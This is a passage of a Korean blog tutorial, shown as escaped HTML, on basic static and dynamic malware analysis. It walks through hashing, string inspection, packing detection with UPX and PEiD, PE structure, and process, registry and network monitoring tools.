확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;HashTab이 컴퓨터에 설치되어 있으면 파일 오른쪽 클릭 후 [속성]에 [파일 해시]라는 탭이 생기고 해시값을 확인할 수 있다.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;br /&gt;&lt;b&gt;3. 문자열 확인&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;✔ 사용 도구: &lt;b&gt;String, bintext&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;  수상한 프로그램 함수 또는 문자열을 확인 가능&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;br /&gt;&lt;b&gt;4. 패킹, 프로텍트 여부 확인&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;  &lt;b&gt;패킹&lt;/b&gt; : 실행파일을 압축하는 것. 실행파일 크기를 줄이거나 디버깅을 방지하기 위해 난독화를 목적으로 사용됨. 실행 파일을 압축하되 exe파일로 저장한다.&lt;br /&gt;  &lt;b&gt;프로텍트&lt;/b&gt; : 여러 기술을 써서 분석을 어렵게 만드는 것. 예를 들어, 디버깅을 쓰게되면, 컴퓨터가 꺼지는 기능&lt;br /&gt;&lt;br /&gt;✔ 사용 도구 : &lt;b&gt;PEID, Exeinfo PE, UPX&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;518&quot; data-origin-height=&quot;255&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/xHK49/btsFp7dSgNV/Uzg1VV31rDPY1TPF7kFwl0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/xHK49/btsFp7dSgNV/Uzg1VV31rDPY1TPF7kFwl0/img.png&quot; data-alt=&quot;Exeinfo PE&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/xHK49/btsFp7dSgNV/Uzg1VV31rDPY1TPF7kFwl0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FxHK49%2FbtsFp7dSgNV%2FUzg1VV31rDPY1TPF7kFwl0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;518&quot; height=&quot;255&quot; data-origin-width=&quot;518&quot; data-origin-height=&quot;255&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Exeinfo PE&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;b&gt;[ 패킹 하는 방법/ 확인 방법 ]&lt;/b&gt;&lt;br /&gt;1) Exeinfope에 파일 넣기&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;519&quot; data-origin-height=&quot;253&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/nowxd/btsFoeYQ68r/WLAKl6WoidywMjc4R81MaK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/nowxd/btsFoeYQ68r/WLAKl6WoidywMjc4R81MaK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nowxd/btsFoeYQ68r/WLAKl6WoidywMjc4R81MaK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fnowxd%2FbtsFoeYQ68r%2FWLAKl6WoidywMjc4R81MaK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;519&quot; height=&quot;253&quot; data-origin-width=&quot;519&quot; data-origin-height=&quot;253&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;2) UPX로 압축&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;명령어) upx -o UPX_notepade.exe notepad.exe&lt;br /&gt;- 패킹을 하면 용량이 줄어들고, 문자열 또는 함수가 검색되지 않음.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;20240301_173313.jpg&quot; data-origin-width=&quot;466&quot; data-origin-height=&quot;147&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qimPb/btsFoe5Hijz/Zk4wZegDKf7PrhVOyIJXL0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qimPb/btsFoe5Hijz/Zk4wZegDKf7PrhVOyIJXL0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qimPb/btsFoe5Hijz/Zk4wZegDKf7PrhVOyIJXL0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FqimPb%2FbtsFoe5Hijz%2FZk4wZegDKf7PrhVOyIJXL0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;466&quot; height=&quot;147&quot; data-filename=&quot;20240301_173313.jpg&quot; data-origin-width=&quot;466&quot; data-origin-height=&quot;147&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;  파일 크기가 달라짐.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/WnjpO/btsFmlYszc5/PaKGlasB5OGgxpqH5aSGLK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/WnjpO/btsFmlYszc5/PaKGlasB5OGgxpqH5aSGLK/img.png&quot; data-origin-width=&quot;581&quot; data-origin-height=&quot;406&quot; data-is-animation=&quot;false&quot; style=&quot;width: 49.5646%; margin-right: 10px;&quot; data-widthpercent=&quot;50.15&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/WnjpO/btsFmlYszc5/PaKGlasB5OGgxpqH5aSGLK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FWnjpO%2FbtsFmlYszc5%2FPaKGlasB5OGgxpqH5aSGLK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;581&quot; height=&quot;406&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/7RcCH/btsFmgbWY9p/fjnLySxPvV22oKCiC3a1OK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/7RcCH/btsFmgbWY9p/fjnLySxPvV22oKCiC3a1OK/img.png&quot; data-origin-width=&quot;579&quot; data-origin-height=&quot;407&quot; data-is-animation=&quot;false&quot; style=&quot;width: 49.2726%;&quot; data-widthpercent=&quot;49.85&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/7RcCH/btsFmgbWY9p/fjnLySxPvV22oKCiC3a1OK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F7RcCH%2FbtsFmgbWY9p%2FfjnLySxPvV22oKCiC3a1OK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;579&quot; height=&quot;407&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;  제대로된 함수 확인 불가&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;3) PEiD로 패킹, 언패킹 여부 확인 가능&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;20240301_173152.jpg&quot; data-origin-width=&quot;517&quot; data-origin-height=&quot;255&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/eiwMDn/btsFt6ywvmV/fxknbx6f6WNyQkIQeCDQCk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/eiwMDn/btsFt6ywvmV/fxknbx6f6WNyQkIQeCDQCk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/eiwMDn/btsFt6ywvmV/fxknbx6f6WNyQkIQeCDQCk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FeiwMDn%2FbtsFt6ywvmV%2Ffxknbx6f6WNyQkIQeCDQCk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;517&quot; height=&quot;255&quot; data-filename=&quot;20240301_173152.jpg&quot; data-origin-width=&quot;517&quot; data-origin-height=&quot;255&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;br /&gt;&lt;b&gt;5. PE 구조 확인&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;  PE(Portable Executable) 포맷 : 윈도우 실행파일의 규격이 규격만 지키면 어느 윈도우에서나 파일을 실행할 수 있다. 표준안 (1993년) MS에서 제정. 메모리에서도 디스크에 저장된 파일 형태로 바로 실행할 수도 있도록 설게 win32의 기본실행파일 형태(64비트는 PE플러스로 다른 구격)&lt;br /&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;✔ 사용 도구 :&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;Pe_ppee, hxd, exeinfope, PEview&lt;/b&gt;으로 PE 정보 확인 가능&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;742&quot; data-origin-height=&quot;649&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ZOuoU/btsFpQQSb4I/9hx4jzUvKrarLeoKzk0qM1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ZOuoU/btsFpQQSb4I/9hx4jzUvKrarLeoKzk0qM1/img.png&quot; data-alt=&quot;HxD&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ZOuoU/btsFpQQSb4I/9hx4jzUvKrarLeoKzk0qM1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FZOuoU%2FbtsFpQQSb4I%2F9hx4jzUvKrarLeoKzk0qM1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;742&quot; height=&quot;649&quot; data-origin-width=&quot;742&quot; data-origin-height=&quot;649&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;HxD&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;b&gt;[ PE 파일의 종류 ]&lt;/b&gt;&lt;br /&gt;실행 파일 : .exe, .scr&lt;br /&gt;시스템 파일 : .sys , .vxd&lt;br /&gt;라이브러리 파일: .dll, .ocx, .cpl, .drv&lt;br /&gt;&lt;br /&gt;PE : &lt;b&gt;PE헤더&lt;/b&gt;와 &lt;b&gt;PE바디&lt;/b&gt;로 구성&lt;br /&gt;대부분이 4D 5A : &lt;b&gt;MZ&lt;/b&gt;로 시작함&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;모든 이런 윈도우의 PE구조는 동일함.&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;2. 동적 분석&lt;/b&gt;&lt;/h2&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;악성코드를 분석환경에서 실행시켜서, 실행 이후의 시스템의 변화를 분석하는 단계&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;즉, 바이러스가 어떻게 동작하는지 분석하는 단계입&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h4 style=&quot;text-align: left;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;br /&gt;&lt;b&gt;  종류&lt;/b&gt;&lt;/h4&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;프로세스, 파일시스템, 레디스트리, 네트워크 조작 행위에 대한 분석 방법&lt;/p&gt;
&lt;h4 style=&quot;text-align: left;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;br /&gt;&lt;b&gt;  방법&lt;/b&gt;&lt;/h4&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;0. 기초 동적 분석&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;✔ 사용 도구:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; 조 샌드박스, File-analyzer.net, Sandboxie&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1) 조 샌드박스 (Joe Sandbox)&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;자동화 분석 툴로&amp;nbsp;악성코드를 업로드하면 자동으로 가상의 환경에서 실행을 해서 해당 악성코드가 어떤 기능을 악성지표는 무엇인지 등을 보고서 형식으로 작성해 준다.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;일부 바이러스의 경우 가상 환경에서 실행이 안 되는 경우가 있어서 제대로 분석이 안 되는 경우도 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1180&quot; data-origin-height=&quot;874&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/tYBQq/btsFpP5uNVY/bjnDZLdz7D5G7IDpB0niB1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/tYBQq/btsFpP5uNVY/bjnDZLdz7D5G7IDpB0niB1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/tYBQq/btsFpP5uNVY/bjnDZLdz7D5G7IDpB0niB1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FtYBQq%2FbtsFpP5uNVY%2FbjnDZLdz7D5G7IDpB0niB1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1180&quot; height=&quot;874&quot; data-origin-width=&quot;1180&quot; data-origin-height=&quot;874&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;b&gt;2) 직접 실행&lt;/b&gt;&lt;br /&gt;- exe파일을 직접 실행&lt;br /&gt;- dll파일은 rundll32.exe&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size14&quot;&gt;&amp;nbsp; &lt;span style=&quot;color: #009a87;&quot;&gt;(예) rundll32.exe 악성 dll파일 dll안에 들어있는 함수&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;br /&gt;&lt;b&gt;1. 프로세스 분석&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;프로세스의 변화를 실시간으로 확인하는 방법입니다.&lt;br /&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;✔ 사용 도구:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;Process Explorer&lt;/b&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;로 정상 프로세스 확인,&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;Process Monitor&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;- 악성코드가 동작하려면 프로세스의 형태로 동작될 것이기 때문에 새로운 프로세스가 생김.&lt;br /&gt;- 따라서, 실시간으로 프로세스의 변화를 확인하고 있으면 악성코드가 어떠한 프로세스를 생성했는지 확인할 수 있음.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;808&quot; data-origin-height=&quot;681&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bG1H6I/btsFsag1lPq/mpfTk4ZaVf5xstukQosSek/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bG1H6I/btsFsag1lPq/mpfTk4ZaVf5xstukQosSek/img.png&quot; data-alt=&quot;Process Explorer&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bG1H6I/btsFsag1lPq/mpfTk4ZaVf5xstukQosSek/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbG1H6I%2FbtsFsag1lPq%2FmpfTk4ZaVf5xstukQosSek%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;808&quot; height=&quot;681&quot; data-origin-width=&quot;808&quot; data-origin-height=&quot;681&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Process Explorer&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Process Explorer&lt;/b&gt; : 작업관리자와 비슷. pid 번호와 하위 프로세스를 확인할 수 있다.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;669&quot; data-origin-height=&quot;585&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b2mobW/btsFsqxfu2c/Pl7S8d5sIxyYO3xtfrEeqK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b2mobW/btsFsqxfu2c/Pl7S8d5sIxyYO3xtfrEeqK/img.png&quot; data-alt=&quot;Process Monitor&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b2mobW/btsFsqxfu2c/Pl7S8d5sIxyYO3xtfrEeqK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb2mobW%2FbtsFsqxfu2c%2FPl7S8d5sIxyYO3xtfrEeqK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;669&quot; height=&quot;585&quot; data-origin-width=&quot;669&quot; data-origin-height=&quot;585&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Process Monitor&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Process Monitor&lt;/b&gt; : 프로세스가 실행됐을 때 모든 로그가 기록됨.&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;그래서 Process Explorer에서 잠시 생성되었다가 사라지는 프로세스를 자세히 확일 할 수도 있음. 그러나 모든 로그가 나오기 때문에 불필요한 정보가 많아 필터 사용이 필요&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. 파일시스템 분석&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;파일시스템의 변화를 실시간으로 확인하는 방법&lt;br /&gt;&lt;br /&gt;- 현재 동작하고 있는 파일들의 상태를 감시하면, 악성코드가 새로운 파일을 생성하거나, 기존의 파일을 수정, 삭제하는 등의 동작을 확인할 수 있음.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;b&gt;3. 레지스트리 분석&lt;/b&gt;&lt;br /&gt;레지스트리의 변화를 실시간으로 확인하는 방법&lt;br /&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;✔ 사용 도구:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;Autoruns&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;703&quot; data-origin-height=&quot;637&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/O7knh/btsFs1jQwhd/D8ixYwhN4Jkissmqk8nvQK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/O7knh/btsFs1jQwhd/D8ixYwhN4Jkissmqk8nvQK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/O7knh/btsFs1jQwhd/D8ixYwhN4Jkissmqk8nvQK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FO7knh%2FbtsFs1jQwhd%2FD8ixYwhN4Jkissmqk8nvQK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;703&quot; height=&quot;637&quot; data-origin-width=&quot;703&quot; data-origin-height=&quot;637&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;- 특정 악성코드는 시스템의 레지스트리를 조작하여 자신이 원하는 정보를 입력하거나, 중요한 레지스트리를 삭제하여 시스템에 악영향을 미칠 수 있습니다. 따라서, 레지스트리의 변화 또한 실시간으로 감지하여 악성코드가 어떤 동작을 하는지 확인할 수 있다.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;[ Autoruns 사용 방법 ]&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;- 윈도우 자동시작하는 프로그램을 알려줌.&lt;br /&gt;- 운영체제에서 어떤 드라이버, 파일들, 서비스들이 재시작하는지 알 수 있다.&lt;br /&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;* 일부 악성코드의 특징이 재부팅 시 재시작하므로, autoruns 도구를 통해 잡을 수 있다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;b&gt;4. 네트워크 분석&lt;/b&gt;&lt;br /&gt;네트워크의 변화를 실시간으로 확인하는 방법&lt;br /&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;✔ 사용 도구:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;Wireshark, TCPView&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;784&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bj0gHv/btsFt6ZBeLK/GRrApa5V9LihGxOkzUKWN1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bj0gHv/btsFt6ZBeLK/GRrApa5V9LihGxOkzUKWN1/img.png&quot; data-alt=&quot;Wireshark&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bj0gHv/btsFt6ZBeLK/GRrApa5V9LihGxOkzUKWN1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbj0gHv%2FbtsFt6ZBeLK%2FGRrApa5V9LihGxOkzUKWN1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;903&quot; height=&quot;784&quot; data-origin-width=&quot;903&quot; 